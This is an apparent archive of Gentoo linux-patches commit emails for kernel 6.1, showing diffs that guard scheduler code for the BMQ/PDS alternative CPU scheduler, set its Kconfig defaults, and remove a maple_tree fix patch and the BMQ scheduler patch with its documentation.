+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+ 
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
new file mode 100644
index 00000000..6dc48eec
--- /dev/null
+++ b/5021_BMQ-and-PDS-gentoo-defaults.patch
@@ -0,0 +1,13 @@
+--- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
++++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
+@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
+ 	  If in doubt, use the default value.
+ 
+ menuconfig SCHED_ALT
++	depends on X86_64
+ 	bool "Alternative CPU Schedulers"
+-	default y
++	default n
+ 	help
+ 	  This feature enable alternative CPU scheduler"
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:52 UTC (permalink / raw
  To: gentoo-commits

commit:     bdd82fbe515cff9a65127ab3ad72a41da18f870b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:52:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:52:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bdd82fbe

Remove unneeded patch

Removed:
1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ----------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 2a0b727d..e9f79f14 100644
--- a/0000_README
+++ b/0000_README
@@ -99,10 +99,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
-From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
deleted file mode 100644
index 53075739..00000000
--- a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
-From: Liam Howlett <liam.howlett@oracle.com>
-Date: Wed, 11 Jan 2023 20:02:07 +0000
-Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
-
-mas_empty_area_rev() was not correctly validating the start of a gap
-against the lower limit.  This could lead to the range starting lower than
-the requested minimum.
-
-Fix the issue by better validating a gap once one is found.
-
-This commit also adds tests to the maple tree test suite for this issue
-and tests the mas_empty_area() function for similar bound checking.
-
-Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
-Fixes: 54a611b60590 ("Maple Tree: add new data structure")
-Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
-Reported-by: <amanieu@gmail.com>
-  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
-Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
----
- lib/maple_tree.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-(limited to 'lib/maple_tree.c')
-
-diff --git a/lib/maple_tree.c b/lib/maple_tree.c
-index 26e2045d3cda9..b990ccea454ec 100644
---- a/lib/maple_tree.c
-+++ b/lib/maple_tree.c
-@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	unsigned long *pivots, *gaps;
- 	void __rcu **slots;
- 	unsigned long gap = 0;
--	unsigned long max, min, index;
-+	unsigned long max, min;
- 	unsigned char offset;
- 
- 	if (unlikely(mas_is_err(mas)))
-@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, --offset);
- 
- 	max = mas_safe_pivot(mas, pivots, offset, type);
--	index = mas->index;
--	while (index <= max) {
-+	while (mas->index <= max) {
- 		gap = 0;
- 		if (gaps)
- 			gap = gaps[offset];
-@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, offset);
- 	}
- 
--	if (unlikely(index > max)) {
--		mas_set_err(mas, -EBUSY);
--		return false;
--	}
-+	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
-+		goto no_space;
- 
- 	if (unlikely(ma_is_leaf(type))) {
- 		mas->offset = offset;
-@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	return false;
- 
- ascend:
--	if (mte_is_root(mas->node))
--		mas_set_err(mas, -EBUSY);
-+	if (!mte_is_root(mas->node))
-+		return false;
- 
-+no_space:
-+	mas_set_err(mas, -EBUSY);
- 	return false;
- }
- 
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:49 UTC (permalink / raw
  To: gentoo-commits

commit:     5bcc961157e1af1569655b8051f2772e0bf2858b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:48:49 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:48:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5bcc9611

Remove BMQ for now, will fix in later release

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 -
 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch | 10154 --------------------------
 2 files changed, 10158 deletions(-)

diff --git a/0000_README b/0000_README
index 62ade3e6..2a0b727d 100644
--- a/0000_README
+++ b/0000_README
@@ -138,7 +138,3 @@ Desc:   Add Gentoo Linux support config settings and defaults.
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
-From:   https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
deleted file mode 100644
index 7c2a77d3..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
+++ /dev/null
@@ -1,10154 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
- 
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
- 
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
- 
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield calls
-+to sched_yield will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
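
For reference, the tunable surfaces as /proc/sys/kernel/yield_type (from
the "yield_type" kern_table entry in this patch). A minimal user-space
sketch that selects mode 2 -- illustrative only, not part of the patch:

	#include <stdio.h>

	int main(void)
	{
		FILE *f = fopen("/proc/sys/kernel/yield_type", "w");

		if (!f)
			return 1;	/* needs root and CONFIG_SCHED_ALT=y */
		fputs("2", f);
		return fclose(f) ? 1 : 0;
	}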
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of the previous Priority and Deadline based Skiplist multiple queue
-+scheduler (PDS), and is inspired by the Zircon scheduler. Its goal is to
-+keep the scheduler code simple while staying efficient and scalable for
-+interactive tasks such as desktop use, movie playback and gaming.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
-+queue and is responsible for scheduling the tasks placed into it.
-+
-+The run queue is a set of priority queues. In terms of data structure,
-+these queues are FIFO queues for non-rt tasks and priority queues for rt
-+tasks. See BitMap Queue below for details. BMQ is optimized for non-rt
-+tasks because most applications are non-rt tasks. Whether a queue is FIFO
-+or priority, each queue is an ordered list of runnable tasks awaiting
-+execution, and the data structures are the same. When it is time for a new
-+task to run, the scheduler simply looks for the lowest numbered queue that
-+contains a task and runs the first task from the head of that queue. The
-+per-CPU idle task is also kept in the run queue, so the scheduler can
-+always find a task to run.
-+
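A minimal sketch of that lookup, reusing the sched_queue layout from this
patch's alt_sched.h (illustrative only, not the patch's actual helper;
PDS additionally remaps the index through sched_prio2idx() for its
rotating queues):

	static inline struct task_struct *sketch_first_task(struct rq *rq)
	{
		/*
		 * find_first_bit() returns SCHED_QUEUE_BITS when no bit is
		 * set, and SCHED_QUEUE_BITS == IDLE_TASK_SCHED_PRIO, so the
		 * fallback is exactly the idle task's queue and the lookup
		 * never comes up empty.
		 */
		unsigned long idx = find_first_bit(rq->queue.bitmap,
						   SCHED_QUEUE_BITS);

		return list_first_entry(&rq->queue.heads[idx],
					struct task_struct, sq_node);
	}
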
-+Each task is assigned the same timeslice (4 ms by default) when it is
-+picked to start running. A task is reinserted at the end of the
-+appropriate priority queue when it uses up its whole timeslice. When the
-+scheduler selects a new task from the priority queue, it sets the CPU's
-+preemption timer for the remainder of the previous timeslice. When that
-+timer fires, the scheduler stops that task, selects another and starts over.
-+
-+If a task blocks waiting for a shared resource then it's taken out of its
-+priority queue and is placed in a wait queue for the shared resource. When it
-+is unblocked it will be reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies,
-+like the mainline CFS scheduler. But BMQ is heavily optimized for non-rt
-+tasks, that is, NORMAL/BATCH/IDLE policy tasks. Below are the
-+implementation details for each policy.
-+
-+DEADLINE
-+	It is squashed as priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in the BMQ run queue
-+design. The complexity of the insert operation is O(n). BMQ is not
-+designed for systems that mostly run rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete for
-+CPU with NORMAL policy tasks, but they just don't boost. To control the
-+priority of NORMAL/BATCH/IDLE tasks, simply use nice levels.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
-+task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priority from 0-99. For non-rt tasks, two different factors
-+are used to determine the effective priority of a task. The effective
-+priority is what determines which queue the task will be in.
-+
-+The first factor is simply the task's static priority, which is assigned
-+from the task's nice level: within [-20, 19] from userland's point of view
-+and [0, 39] internally.
-+
-+The second factor is the priority boost. This is a value bounded between
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] that is used to offset the base
-+priority. It is modified in the following cases:
-+
-+*When a thread has used up its entire timeslice, always deboost it by
-+increasing its boost value by one.
-+*When a thread gives up cpu control (voluntarily or involuntarily) to
-+reschedule, and its switch-in time (time since it was last switched in to
-+run) is below the threshold based on its priority boost, boost it by
-+decreasing its boost value by one, capped at 0 (it won't go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
- 
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
- 
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
- 
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
- 
-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
- 
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertain rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
